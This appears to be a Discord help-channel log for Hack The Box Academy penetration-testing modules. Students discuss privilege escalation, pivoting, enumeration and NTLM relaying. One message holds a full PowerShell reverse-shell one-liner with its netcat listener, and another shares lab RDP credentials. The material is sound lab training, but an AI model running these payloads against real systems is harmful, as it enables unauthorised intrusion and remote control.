#modules
yes
what are the tools you've tried
Hey, I found the flag for the Bypassing Security Filters under the Web Attacks module, but I can't seem to submit it successfully. I've made sure to remove all leading and trailing white spaces.
Edit: turned out to be an issue with my clipboard, and I was submitting the flag from the previous exercise
I have tried JuicyPotato.exe, PrintSpoofer64.exe, RoguePotato.exe
juicy should work, did you specify a clsid?
I could not obtain the CLSID with my current privs
there is already a list in the repo
Which sysmon config file are you using? There should be one linked in the module that points you to a Github repo that hosts an example config.
This example config is there on the Target too. Use this.
Godpotato is better and lazy way imo
I could not find a list for 2019 Windows Server
Working locally on the target, but failed to obtain the reverse shell as the SYSTEM
Oh maybe try PowerShell base64 from revshell com
already did, it's not working
Oh dang
if it works then use another way to get access other than a rev shell
think outside the box
Also you can run a binary as system maybe try to use beacon or msfvenom binary
Also try to use ports like 443 53 445 80 so if there are firewall rules it doesn't get blocked ( I don't remember if AEN had that)
Section: https://academy.hackthebox.com/module/158/section/1434
@wise vault Do you happen to know what they're talking about here?
Or does anyone else know perhaps?
Is it referring to if we're trying to pivot from an internal machine that does not have a public facing IP address?
So when setting up server.py, do we need to configure it to have credentials for the NTLM authentication. Would appreciate if anyone can confirm my understanding. Thanks.
If I've read it right, the proxy server only allows connections after NTLM auth was successful. But you don't need to worry too much about this, NTLM is getting deprecated, let alone this kind of proxy; I've never seen one of those in the wild.
thank u guys
sure thing
the web requests fundamental module is very good
Hello, I am new to these types of things so I didn't really get how I can use https://github.com/FSecureLABS/SharpGPOAbuse in Windows, as it is not an exe file. Can anyone explain to me how to do it? (it is not really necessary but I read it here https://academy.hackthebox.com/module/74/section/709)
I have a question?
Could it be possible to make your own labs instead of using the attack box and target box of Hack The Box?
Let's say you enrolled in the Hack The Box Academy CPTS?
Sure, you mean like setting up a homelab? Many of the modules/sections have suggested standing up your own server/service to experiment with dangerous settings.
I would argue it's crucial to play around as much as possible with the stuff.
Thanks for answering my question
Hello
The reason why I want to do this is because the Hack The Box target box is very slow, especially the Windows target box. It's really a burden to me and slows down my studying.
In the starting module or somewhere it tells you the preferred way is creating your own VM machine. Then you just use the provided OpenVPN.
Well, the trade off will be that standing up your own boxes will be a whole different thing that slows you down. You do learn a lot though. Also, you'll still have to go through the modules and use their boxes to answer the questions.
Schainy has good advice too. Using your own kali/whatever box + VPN is better than the pwnbox IMO.
Wanted to thank htb staff, that windows hosts on academy run pretty smooth now. Thanks for the improvement 🙂
What VPN are u using? I would recommend using TCP. For me it runs smooth recently, but was having the same issue before.
whats suspicious about this?
Also this is meant to be suspicious and it looks normal to me so
module ACTIVE DIRECTORY ENUMERATION & ATTACKS / Credentialed Enumeration - from Linux: has somebody actually reproduced the steps in the BloodHound section? ( I know you don't have to, you can answer the question without)
RDP and SOCKS Tunneling with SocksOverRDP: in this section when I extract socksoverrdp-server.zip the .dll file is auto-removed. What the heck is this?
anyone please
@next bronze are you still there?
@fathom pendant
yeah it works fine
turn off real time protection in defender
already turned off
doesn't sound like it since it's getting deleted
did you guys also face this before
Could anyone possibly provide a nudge on the new broke auth skill assessment? I'm on the OTP part. I have brute forced for 4 and 5 digit 2FA codes and no luck. I have also checked the requests in burp to see any hidden redirects or html information.
I also don't know
I double checked, now reset the machine
I was also not able to brute force it 😉
let see
Oh
can you show a screenshot of it disabled
ok
Does anyone know why the lab in module: ADVANCED XSS AND CSRF EXPLOITATION and in section: Misc CSRF Exploitation works differently in Burp's Chromium vs Firefox?
I get 302 redirected when I try to access /profile.php and I cannot read the flag, but in Firefox I can access it normally. I even tried restarting the lab but I'm pretty confident now that it has something to do with Chromium.
In the walkthrough it says this: "Students need to follow the redirects until they arrive at /profile.php?user=htb-stdnt, then go back to Firefox to view the page" but why can't I view it in Burp's Chromium?
Yeah different browsers react differently to various labs. It's been a while since I did that module, but I do recall some modules I had to use FF over Chrome
That is not real-time protection, that is virus and threat protection. disable real time protection and you won't have a problem.
In my notes I had 0 mentions about this, I'm doing this module for the 2nd time. So maybe it's some update then.
Has someone done the Attacking Common Services module? I have trouble with RDP
I don't get it, how can I see the graphs?
did you dump the zip file into bh?
yes
I've just completed the module if you have questions.
is that wrong?
Do a search for something then it should show up
Neo4j is the underlying graph program. Bh runs alongside it and you log into Bh, then you can drag the data you get from sharp hound or bloodhound python into bh
Looks like the data is in there. Do a search for a user or the domain stuff should pop up inside bh
yes it appears something. thank you both 🙂 🙌
But I didn't get a graph as nice as the one in the example 
ah yes thx. sorry total bloodhound beginner
are you still there?
We will need to transfer SocksOverRDPx64.zip or just the SocksOverRDP-Server.exe to 172.16.5.19. We can then start SocksOverRDP-Server.exe with Admin privileges. how is this possible ? systems have no connectivity. it should already be there 🥺 why HTB .....?
its really fu***** s***
Transfer from the first machine, to the second
i did that now can you help me
No
see please
Did you start cmd/powershell as admin?
I am stuck on that line
how to copy
.exe to 172
Scroll up there's connection info on how to get to that host
Mstsc has a drive share option
You might need to click advanced options to select it
It's all about clicking around, or using Google
I hope all is the same situation as you.
i did that
it's not accessible, you mean to share it?
Yes you can share a file location
Or use a billion ways to share files taught in the file sharing module
yep I have issue on attacking RDP
I tried to attack SAM, LSASS with previous modules' content but nothing, no hash
so idk what to do
You know what, I'm sorry, I completed 'footprinting common services' which at one point involved RDP and confused it with your question about 'attacking common services'. With your question out here though I'm sure someone can offer insight into your question. 🤦
no problem, thanks tho ^^
Hello, new here trying to learn CTF, but I'm stuck on the flag command, any input for me please
what ?
wdym ?
Anyway if someone have a clue I'll be grateful :
I'm stuck at Attacking common services - attacking RDP at the 3rd question
I know what to do, but I've tried to attack SAM, LSASS from the Password Attacks module, and I have found 0 hashes, I don't know what to try anymore, can someone help me please?
Hello, I'm trying to connect to htb through a vpn on my vm. What password do I input after using ssh htb-student@[ipaddresshere]?
Nvm, figured it out
Alrighty. Thanks, Xre0uS.
lol, idk if it was an OSINT question but I found the flag, I don't think it was legit, I have no clue how to enum the hash tho
I did successfully
last one here
Is there a need to configure something for 172.16.6.155 except 127.0.0.1:1080 in Proxifier?
I did 127.0.0.1:1080 socks5
You configure proxifier in the first host
yes for 127 settings
Yep
Is there a need to configure more?
Shouldn't be
or should I run it as admin?
I mean yeah, run as admin
I ran Proxifier as admin, then launched mstsc.exe from cmd (as admin), then entered 172.16.6.155, but it's not working
failed
enter right ip
All 3 hosts have different creds
yes
And you got the same popups as the examples?
Step 4 means open a new terminal
You can't run commands while the openvpn process is running
Opened it, but when I try to ssh I don't know what password to put
Look at the questions
did I circle the wrong step?
no yeah that section
after opening a new terminal and using ssh
Above the questions should be a command to ssh to [ip] with username "htb-student" and password "insertpasswordhere"
is that the literal password or
Scroll all the way down
doesn’t say one
To where there's questions
yes
yes
¯\_(ツ)_/¯
hold on
Try resetting the target and doing the steps again
It helps to clarify what module you're working on
😢 I will lose all the configs that I did in the last 3 hours
no way
It shouldn't take 3 hours to re-set it up
Also 3 hours, the internal hosts could have silently died
i added time
¯\_(ツ)_/¯
ok let me do something
Are the creds in the text somewhere
Often 'username:password' will be the format
Ah, sorry, I didn't think it mattered because it didn't seem module-specific 🥲 Getting Started --> Nibbles - Initial Foothold
Ah
That's why there's no instructions
Because it's an academy version of a box, which won't have the htb-student user
None that I can find
You need to follow the steps in the section
This is all to do with enumerating a web page
but can I do that without sshing in to the machine?
Yes
ahh ok sweet
It's hosting a web port on 80
All the nibbles sections are interconnected @vagrant osprey
Congrats. In the future, please don't randomly ping me, I do try and sleep
thanks a loooooooooooooooooooooooootttttttttttttttttt! whenever I ping you I get my answer
sorry
The next time you randomly ping me, I will block you
got it 🙂
Alright thank you!
I'm not on-demand help
its ok cool down please
what is it?
Good luck, happy hacking
❤️
Hello dear hackers,
https://academy.hackthebox.com/module/77/section/731
None of these options redirect to https://app.hackthebox.eu/profile/overview
All the options redirect to https://academy.hackthebox.eu *
Am I mistaken or is the course outdated ?
This section covers the UI on app.hackthebox.com so you need to be logged in and follow along there.
OK thanks for answer.
Is there any way to go to app subdomain from academy subdomain ?
Or should I treat those as different websites ?
They are separate websites
ok
You can 100% academy and still be "noob" in app
App progress is via active boxes and challenges
OK that's what I just figured
app is exercises and "real world" practice, academy is courses
👍
Hello HTB expert dudes. Anyone know how to set up OpenVPN on the target Windows box?
?
You don't run openvpn on the targets
Windows target box on cpts module slow as F.
You run openvpn on your system to connect to targets
Nope. I have problem with the Windows target box slow as F
There is no "cpts" module, can you be more specific what module you're doing
Did you try changing vpn regions, using tcp
Any module that had a windows box target
That's kinda agnostic of it being part of the CPTS path
It really sucks.. HTB should fix this. Hope HTB can read this and improve their service.
Message support whenever you're affected by it
Paying high amount of money. Not a joke
They have to.
No, they don't have to
HTB doesn't pay support staff to monitor the discord, occasionally one may be on the discord to chat with -- but that's few and far between
They have to hear their end user customers because that is how they make money.
They do. Just via their actual support methods and there's also now the /feedback command, that gets sent to HTB
But complaining on the discord literally does nothing
I'm telling you how to get in contact with someone that can help you on the HTB staff end
Ok thanks for your advice. Screw them. Took my money and offered me bad service. Really disappointed.
it works fine for me ¯\_(ツ)_/¯
I also gave you a couple quick and easy troubleshooting options
Change vpn regions, use the tcp download instead of udp download
I hope that will work on my end but unfortunately it's not. Thanks for your kindness.
Been a few weeks in academy.htb.com, but first time using app.hackthebox.com
Unless I am mistaken, I am supposed to have spawned a PwnBox from which I should be able to hack the target machine...
But I don't find any way to actually see the VM or enter it, what am I missing ? 🤔
Top right
The app pwnbox is different from the academy one
And is time-limited for free users
2 hours for the lifetime of the account
The academy restrictions are:
Limited internet
One spawn per day
OK thanks, found it
You don't have to do an app machine rn btw
What if I have subscribed for 1 month in academy? Does it work for app as well? Or do I need two distinct subscriptions?
Have you opened a ticket with Support?
They are separate platforms
Well it seems I have to
No you don't
Progress on app and progress on academy are separate
You can stop the machine and close the pwnbox
Also for starting point machines they have their own section #starting-point
Where are you seeing it tell you to do a starting-point machine btw?
The page is asking me to give the root flag.
I don't understand how I would give it without actually connecting to the target machine ?
(I have read the PDF associated and the flag is shown but in an image so you can't copy/paste it)
That's completely separate from academy, and flags aren't static in labs, so you can't just copy/paste
I'm asking where in the academy page that you were on does it tell you to do starting point
Starting-point is not linked to academy progress
Anything on app.hackthebox.com/ will not be connected to academy.hackthebox.com/ in terms of progress
I thought it would make sense to do the Starting Point before actually doing the easy box
"Here are some ideas"
I got it, so if I want to do it as well, I'll need to subscribe to app
Yes
But doing those is not a necessity
That checklist is just an example
Especially the battlegrounds one as no one really is on battlegrounds
If you're doing the cpts(pentester) path, you'll gain a lot of the skills along the way
OK so you believe the CPTS path contains enough practice ?
For cpts, yes
It goes through the basics of footprinting and attacking basic services
It doesn't go too deep on the web end
interestingly enough the last section of AEN suggests to complete Starting Point
Hello, I'm trying to use the academy and beat "Nibbles" but as soon as I input the right creds in the admin page, it won't load anymore
VPN or PwnBox?
If VPN, try a different endpoint.
Also restart your target.
vpn
Nibbles, not nipples
I switched the VPN now it works 😄 Free nipples i guess?
I'm just saying you mistyped the name
thank you ❤️
Why am i getting permission denied in dcsync attack.
It sounds like you don't have permission to write to that directory
😂 Got it
Hello I am currently on the knowledge check of Getting Started. I was able to obtain the hash and crack it to now sit in the admin section of the web service. My question is: is it normal that the upload button is not working or is this on my end? Thanks
Linux privesc skill assessment - stuck at flag2. Escalating from htb-student to tomcat. Nothing seems to be working. User is not in sudoers. Setuid does not pop up anything worthwhile for GTFOBins.
Yes, the upload button doesn't work, try researching more maybe plugin versions
Thanks for clarifying
Got it! Can upload now. Awesome
where do I spawn in my machine from HTB?
I don't know why the spawn machine option has disappeared
wdym disappeared? You clicked on it and the instance is starting up. It actually says so in your screenshot. Also it's better to ask here #starting-point
no i mean the option to be able to use the pwnbox, - my bad for phrasing it wrong
On the top right (next to your username) you can choose how to connect. From there choose Starting Point and then Pwnbox. Otherwise you can refer to this
As explained earlier; this is different from academy the upper right should show your pwnbox, but if you've already used your 2 hours, that's it
I am on the "Network Enumeration w/ Nmap" module on the final task "Firewall and IDS/IPS Evasion - Hard Lab". I have run nmap with sudo privileges //syn scan and am only returning open ports 22, 80. Port 53 UDP is open, Port TCP//53 is filtered. I have tried -sV and -sC to try and enumerate the services but I am coming up short. I am running Nmap version 7.93. I have also tried to spoof my source port to port 53. Any guidance?
try using ncat
go back to the section before the easy lab
read the section at the end
Look for other ports
Did you add -p-?
I did. I was missing a port tho on my initial scan. I appreciate it!
:D gl
Can anyone help with the Linux priv esc skill assessment? Stuck at flag2 for hours now, not able to escalate. What I have checked:
sudo - don't have sudo rights so can't run sudo -l either
setuid - none of the binaries have a GTFOBins exploit. (if any of these is the way then please tell, I will dig deeper into this)
cron jobs - found a cronjob e2scrub_all
also checked for kernel based exploits. Although the sudo version is vulnerable, as the current user I cannot perform sudoedit.
for anyone doing the windows server, "Dealing with End of Life Systems", I couldn't get my usual xfreerdp command to work so I used this instead:
`xfreerdp /dynamic-resolution /compression-level:2 /u:htb-student /p:HTB_@cademy_stdnt! /v:IP /cert-ignore /sec:rdp`
you'll kick yourself, this one is more straight forward than what you've been trying. have you found "where" the flag is yet?
I'm stuck in the Broken Authentication skill assessment, anyone have advice or tips?
I'm stuck on the 2FA OTP
flag2 location yeah. Can't pretend to be that user as even su is not working
not to sound like yoda, but you don't have to pretend to be that user, be that user!
that's where I am stuck at, escalating into that
what's the very first thing you do when you pop a shell on any machine?
(possibly second after whoami)
id,whoami
to check for groups
then sudo -l
ok third hahhah
pwd
how does ls come into the picture? I mean I cannot read bash-history either. If you don't mind can we talk in DM? A lot of spoilers can get dropped.
ohh
Hi Everyone, I'm having difficulties understanding this paragraph
"Penetration Testers will configure reverse proxies on infected endpoints. The infected endpoint will listen on a port and send any client that connects to the port back to the attacker through the infected endpoint. This is useful to bypass firewalls or evade logging. Organizations may have IDS (Intrusion Detection Systems), watching external web requests. If the attacker gains access to the organization over SSH, a reverse proxy can send web requests through the SSH Tunnel and evade the IDS."
So would the reverse proxy be to receive a connection from inside the organization's network?
Also, does 'external web requests' means outgoing or incoming web requests?
Thanks brother, I overlooked it and went straight to the complex stuff
I guess it's just saying the attacker sets up a reverse shell on the target, so that the connection initiates from the victim which may not be detected, although even outgoing network traffic is monitored in companies. And external web request means both ongoing and outgoing requests; in this case it talks about incoming requests.
Essentially the attacker is cloaking itself as being a reverse proxy on the compromised endpoint. Essentially listening in on the port of communication and relaying that info or connection back to the attacker. It evades the IDS/firewall due to the endpoint being trusted by the network and they don't know it's been compromised, plus all they would see is the encrypted SSH traffic, not the specific web requests.
?
It can be either, external just means outside the network
hey guys I need help with a reverse shell
I did everything but the netcat listener isn't picking up the shell
Make sure you're using the right LHost
I've tried multiple ports
172.16 can't speak with 10.129
it's supposed to be my own box's tun0 address, right?
What section?
yeah that isn’t working
and I'm getting my payload from revshells so I know it's correct
I'm not sure what else I'm missing
I suggest using the powershell payload from the section
And replacing the relevant ip and port
It should work
but it’s the same one essentially
All you gotta do is replace the ip and port
lol I did
the shell works
the listener just isn’t catching
the code executes successfully
Then the shell isn't working
Copy your code here and wrap it in backticks
`like this`
‘powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('10.10.15.61', 777);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()"’
That's a quote, not backtick
ohhh sorry hold on
`powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('10.10.15.61', 777);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()"`
using `sudo nc -lvnp 777` for the listener btw
Worked fine for me running from cmd
As stated in the section, run the given command from command prompt
where does it say that?
the whole lesson has been in PowerShell
but I'll try it
ofc it worked …
well thank you
sorry to waste your time😭
Just above
"On the Windows target, open a command prompt & copy and paste this command"
are you sure you’re on the same section? mine literally does not say that …
mine says “Try running some standard windows command to practice a bit”
I'm fairly certain considering I'm staring at it
"Connect to the target via RDP and establish a reverse shell connection" is the question yeah?
yes
<@&861185840277487616> preemptive ping considering the names that are typing
Read just above the provided command that's the powershell -nop
okay I see it, thank you. So what is the difference between PS and cmd??
This launches a powershell that will basically run in the background
I also believe cmd interprets things differently than ps
You know, it'd be much more beneficial to you if you don't ask questions you could Google, with all due respect; so called "google-fu" is probably the most useful skill you can acquire
It's not uncommon for people to ask silly simple questions here
¯\_(ツ)_/¯
@rustic sage okay
In my country we have a saying that roughly translates to
"Give a man a fish and you'll feed him for a day, give a man a fishing rod and you'll feed him for life". I wanna give that man the fishing rod
And in my country bashing people for trying to learn is called being a dick
I just had pineapple pizza, and i LIKED it
"With all due respect" is a bit of an oxymoron
<@&861185840277487616> no need for that language my guy
Also I guess the language filter is broken or you're bypassing it in some cheeky way
You do realize they have logs yeah?
Bots log what something was said before it was edited
can a mod or staff help
specifically with https://academy.hackthebox.com/module/39/section/415 I had to Google the answers (the page that's supposed to load does not; the Metasploit attack that should work does not as the page is broken).
this is a basic "metasploit" thing
I have tried 4 victim machines
yes that one
I have pictures if you want me to PM them or whatever showing commands and proof of solve; at this point I'm doing it to learn but it's not playing nice.
What exactly is it you're having issues with? You're properly backgrounding the shell yeah? Ctrl-z after it executes
And no, I'm not taking pms
You can follow #welcome to be able to post images
it will not load the page, so you cannot even find its el*; then it will not run the exploit
I do not really want to link accounts, I only ask as it's a picture and I figured y'all didn't want it here, not that the answer is not easy to Google
I'm running through it now to verify if it's a you issue or a lab issue
that's all i want ^^
Worked fine for me
Got both the expected exploit and the expected escalation working
You can just curl the page
Also make sure http:// not https
I did
It loaded just fine for me though
for me if I load it's just solid white, curious
Do you have a title in the html or is it just loading
Then I suggest changing vpn regions and trying again
I'll be generic but
find (name)
set lhost
set rhost
use number
run
I get this msg >
exploit aborted due to failure: unexpected-reply: Upload was not successful
[*] Exploit completed, but no session was created.
Again; change vpn regions, download a new pack, respawn target, try again
Also curious; if you do ip a do you have multiple tun ips
Like tun0, tun1, tun...
If so, that could also be a cause
Also running pwnbox and your own vm can also be an issue
Anyway
Staff doesn't monitor this chat
Your best bet if you want to reach staff is to use the support chat on the website
ok ty will do, appreciate you =3
worked on the first try so it was not a me thing, ty again 😄 I was done in like 1 min max
Ye usually it's a 60/40 on skill issue/lab issue
Always keep in mind the basic troubleshooting and it's ez
https://academy.hackthebox.com/module/147/section/1335
The target is running a vulnerable version of sudo (1.8.3), so I attempted to use Metasploit's sudo Baron Samedit exploit. However, I never received the reverse shell. The exploit does indicate that it has completed, but nothing else happens. I have ensured that the exploit options are correct and that the shell session is compatible with the exploit.
If that was not taught throughout the module, then it is not the appropriate way to move forward
I have completed the lab the module way but was just wondering why the exploit won't work though
I had issues with that too, I moved on from it and will revisit later on, by memory a library issue was the reason?
ohh the exploit does require a specific version of libc I think
I am trying to do pivoting.
Here is the scenario.
- I have my attack machine A, which is a Linux machine.
- From this attack box, I can access machine B which is also Linux machine.
- From machine B, I can access internal Windows machine C through RDP
- From machine C, I can access Windows machine D through RDP.
Now, I need to perform a nmap scan on machine D. The nmap tool is only present on the attack box A. I set up a chisel proxy server on C so that the traffic on 1080 port of B is tunneled dynamically to D through C. I also set up static port forwarding such that the traffic on 1080 port of A are forwarded 1080 port of B. I configured proxychains to route the traffic through 1080 port on A. I then used proxychains to run the nmap command as
proxychains nmap -sT -v -Pn --top-ports 20 D -oN D.nmap
I know for sure that RDP is running on D, but the scan shows the 3389 port as closed. How should I approach this situation?
What does your /etc/proxychains4.conf file say?
is it routing through port 9050 or 1080?
1080 localhost port
Ok so your 127.0.0.1 9050 is # out in your conf file?
Chisel server is running on the linux target
I'm confused, is telnet just very unsafe since you can get in with any random password?
Yes
telnet is considered unsafe because it transmits in cleartext
No. Chisel server is running on Windows C. I connected to that server from Linux B from chisel client.
This creates a tunnel.
A=pwnbox/vm B=Ubuntu C=Windows D=DC, correct?
Yes
Ok, have you tried this as a reverse pivot with chisel?
"There may be scenarios where firewall rules restrict inbound connections to our compromised target. In such cases, we can use Chisel with the reverse option."
I tried this. But this is one more level of pivoting so not working
Which section is this one? Just so I can go back to it
This is not required by any of the exercises. I was just curious.
Right
I'm on the easy footprinting assessment lab
I'm watching a walkthrough on how the person got access to it using FTP
but the way he did it is weird, it's like he knew the username ("ceil") and HTB doesn't tell us how to enumerate usernames for FTP
and he didn't do it either, he just ran an nmap scan
and then he did ftp ceil@ip
Take a close look at the Nmap scan
okay 1 sec
my nmap scan
doesn't show the username anywhere
hi menace bunny
this is the scan of the video...nowhere does it say "ceil"
I used -Pn -A and -T4
as well
Try || -sV||
okay let me try that, thanks
what are you trying?
I don't think there's much to be spoiled for that assessment
just the general techniques will do
yeah so just what you've tried will do
(Ceil's FTP) found it bruh
thanks
that's SA1 yeah? There's no need for DACL abuse for that
do u know how I can get the password? 😅
Use the techniques from the module
which question is that for?
yeah which question in that assessment
oh wait trust attack, my bad I saw assessment 1 and thought it's part 1 of the tier 2 AD module
ok dm
Hi guys, I managed to find the FTP user for a login but can't seem to find the password. In the video that I'm watching, the guy managed to enter the password from the nmap scan (evidently) which is weird
There are no official videos. Maybe you should ask the person who made the video how they did it. If he doesn't explain it in the video.
I advise you to study the module again. Then you too will find a way to get the password.
okay cool, but do you mind nudging me in the right direction? 😅
I have run this script
`nmap --script ftp-brute -p 21 <target-ip>`
but it's been on that for like the past 20 mins
Was this shown in the module?
no, but neither was how to get the password of a user in FTP, I'm 90% certain
can someone pls help 😦
If it wasn't shown in the module, it's probably the wrong way 😉
I'm so confused, there's nothing in the module that shows us how to get the FTP password
turns out I can do that by chaining the proxies in proxychains configuration!
Read the text of the task again very carefully
Hello everyone,
I'm stuck at the question “What is the admin email address?” footprinting/imap-pop3
I logged on to robin, tried to read some mail, but no mail present.
I've been looking for a day
hi
I am just stuck on 172.16.6.45; there is no RDP but I can SSH, but the creds of vfrank are not working for this
I am on the pivoting final skill assessment
anyone who solved it
I can RDP to 6.25, I completed it
ok thx
smh bruh 😂 they were literally on the page
@normal sand hi are you there?
if I'm not mistaken I think you have to use nmap for that part
Can nmap detect e-mail addresses?
i think if u use the -a flag it should show something
hey guys have anyone finished the dacl II module ?
with NSE ?
cant remember how I did it
nah I never ran those...i usually use -Pn -A and -T4
but u gotta look at the info carefully
just look for the @ in the results
anyone who completed pivoting module
Hey, I'm here now.
need help
What's up?
Section: Web Server Pivoting with Rpivot
Sure, but you're ahead of me atm.
I'm on the final assessment, just stuck on one question
Ahh, it'll take me a while to get there. Been busy with life so got slowed down on the module progress.
i think, i don't have to use nmap
maybe not...I cant remember how I did that 😅 but I think the answer was on the page (how to do it)
no prblm thx
@wise vault Can I DM you? Need some help.
sure
Module & Section: PIVOTING, TUNNELING, AND PORT FORWARDING - Web Server Pivoting with Rpivot
Using the concepts taught in this section, connect to the web server on the internal network. Submit the flag presented on the home page as the answer.
I'm on the home page and can't find the flag 💀 😑
I've tried using curl and went through the source code, still nothing.
I can DM someone a screenshot, can't send it here since it'll be a spoiler. Please lemme know if you can help with this.
It should work with curl, what command are you using?
anyone here know how to fix this type of issue?
When Pivoting
Tried doing the "proxychains nmap -sT <internal ip> -p 445"
result is the attached pic
But in the Module doing this command resulted in an open port
Currently Using a eu-vpn not pwnbox
Using a pwnbox also shows a result of an open port as well
disable ping when scanning through proxychains
shows filtered, err no way that i need to use evasion or stealth scan in here :<
I was trying the incorrect IP address. I was looking at the wrong web server. Thanks 😂
oh fair, I was also a bit confused by that for a bit since they did not put the ip address you need in the question
Yeah, and when I did a ping sweep, there were a ton of hosts that were up 😂
pay attention to detail, it is under your nose
module - Attacking common services, why do we turn off smb in responder and how does ntlmrelayx relays credentials to other computer ?
instead of turning off smb in responder, we could just not run responder right because it was listening for SMB requests
hey guys!! I'm stuck at two questions. Please help me!!
- Footprinting -> DNS
Identify if it's possible to perform a zone transfer and submit the TXT record as the answer. (Format: HTB{...})
- Footprinting -> SMTP
Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer.
I used smtp-user-enum -M VRFY -U footprinting-wordlist.txt -t <ip>
still it says 0 result what should I do?
You must perform a zone transfer of the subdomain
Identify the potential subdomain when you first perform zone transfer of inlanefreight.htb
I did try axfr but it's not happening
you will find subdomains like internal.inlanefreight.htb, ns.inlanefreight.htb, perform zone transfer on them
okay and what about smtp?
this should work since you are trying with the wordlist on resources, let me try
plz try, I'm getting 0 results with the command I said
Hello, I need some information about
LINUX PRIVILEGE ESCALATION - Privileged Groups
As said in this part of the module, I looked for cron jobs in the syslog part. The job started as root could be modified so I did it. I am now root of the box and it looks like this was an unintended way of doing things as the flag is nowhere to be found and I can retrieve md5sum of flags from later sections of this module
Is there something I missed?
increase the timeout to 20 instead of using the default 5 seconds
smtp-user-enum -M VRFY -U footprinting-wordlist.txt -t 10.129.66.183 -T 20
WARNING: You specified a lone username or host AND a file of them. Continuing anyway...
ERROR: Can't open username file 20: No such file or directory
I got this error
rtfm. Increasing the timeout is not -T
Did you try with another user list?
If I remember well SMTP had this issue
Where you had to change userlist in order to find something
which another one?
I don't remember which one but can try SecLists/Usernames/xato-net-10-million-usernames.txt
okay let me try this
Or was there any user list in the module section ?
from my notes it is the right wordlist, I was having the same issue as well but increasing the timeout I was able to get the answer.
naah, it said to use the same wordlist from the resources, and I'm trying the same thing as @thorn hawk
thanks @thorn hawk it did work.
Well the username is in the list, mb
no problem 👍
now will try DNS too
can somebody explain this?
you need responder to poison the requests so that they will get redirected to your ip, but ntlmrelayx also needs to be able to receive the requests to relay them
so we turn it off so that we do not capture the credentials but rather just listen for LLMNR queries and relay them to ntlmrelayx, which sets up an smb server?
kinda, ntlmrelayx is already listening, it just needs the requests to come in so that they can be relayed elsewhere
if responder is also running the smb server then it can't listen on the smb ports
I usually just start ntlmrelayx before responder so that I don't have to modify the config but YMMV
yeah thats correct, ntlmrelayx sets up a smb server itself and the module does not specify how to identify the hosts you can relay the credentials to
probably out of scope, there's always the ntlm relay module
alright, thank you :))
What is the FQDN of the host where the last octet ends with "x.x.x.203"?
Help me with this
@round moat use dig within the specific zone then grep the value
I'm not getting any output
Subdomains of Subdomains
I used dig @ip internal.inlanefreight.htb axfr and got certain output
but it doesn't have the exact ip related to 203, the closest one is
mail1.internal.inlanefreight.htb. 604800 IN A 10.129.18.200
Try using the showcased tool
@fathom pendant should I go to support with this one
That's not a bug, you need to replace the port numbers with PORT
Also; spoiler so delete
Bro
PORT 53903
dnsenum --dnsserver 10.129.42.195 --enum -p 0 -s 0 -o subdomains.txt -f fierce-hostlist.txt internal.inlanefreight.htb
I tried this but still cant figure it out
AA thanks @fathom pendant
Just be patient and try all subdomains
Will try now anyways thx
The answer key doesn't know the port# that's spawned
Yep it's a bit strange, before we always used the actual port
not the hardcoded word PORT
will be reading hints more accurately now
Well how would the answer know what random port gives the answer
The backend answer key isn't tied to the front end spawn
I think the VM which I used from the browser
That. Doesn't matter
The in-browser vm connects to the vpn, like you would with your own vm
yep I mean in general its connected
Loosely
because we can simply search the answer in google
The backend answers are hardcoded
hey there I have a question: I'm working on this Windows Event Logs module and when I RDP into the machine to see the event logs, the machine is so zoomed in I can hardly do what I need to do. How can I make this easier to use?
change options on the rdp i guess
i use this alias alias xfreerdp='nohup >& /dev/null xfreerdp /w:1600 /h:900 /timeout:100000 /cert-ignore /drive:home,"/tmp/Temporary" +auto-reconnect'
no /dynamic-resolution?
how do I stop the memory map view from moving?
it just sorts itself. making it impossible to select
hi guys sorry to disturb, I recently got hacked by a trojan virus on my computer that completely emptied my phantom wallet. I need some experienced guys to help me understand who did this to me. I really just want to expose them, to help any other victim that these guys will target. They operate on a website on which they make you download a trojan virus. I was able to disassemble it with ghidra, and I need someone to help me decrypt those files. Thank you so much in advance, I really hope someone will help me.
https://academy.hackthebox.com/module/205/section/2351 can anyone give a nudge on whitebox attacks type juggling authentication bypass
So my question is:
"Try to use what you learned in this section to fuzz the '/blog' directory and find all pages. One of them should contain a flag. What is the flag? "
My issue is, i've followed the steps but it doesn't output me what the found website is.
Firstly it displays ".phps" with a status code of "403".
I've ran the word directory list after with the /blog/FUZZ.phps to see a webpage but im not sure if i've done it correctly.
ffuf -w /opt/useful/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://83.136.251.109:52734/blog/FUZZ.phps
this image above was to find the file extension after the blog
this is what i ran after to find for webpages but it outputted several webpages
And i assume that was to be invalid and I've done something wrong
include the module and section name, we won't know which specific question otherwise
Alright
Module name is Attacking Web Applications with Ffuf
And the section is
page fuzzing
/blog is a directory
ffuf returns lots of false positives, use a flag to filter out the invalid response size
so it won't be blog.php, it will be a file inside the directory, e.g. /blog/index.php
but how do we know it's index for sure
a directory contains files, it won't have file extensions
it could be another webpage in the future for other things
should be used always?
-fs right
Actually i got a question, when i did the ffuf command earlier, how come we got a ".phps"
personally i found that a little odd to myself
yes, i usually run it the first time to figure out the size of the content i want to screen out then run it again with the flag
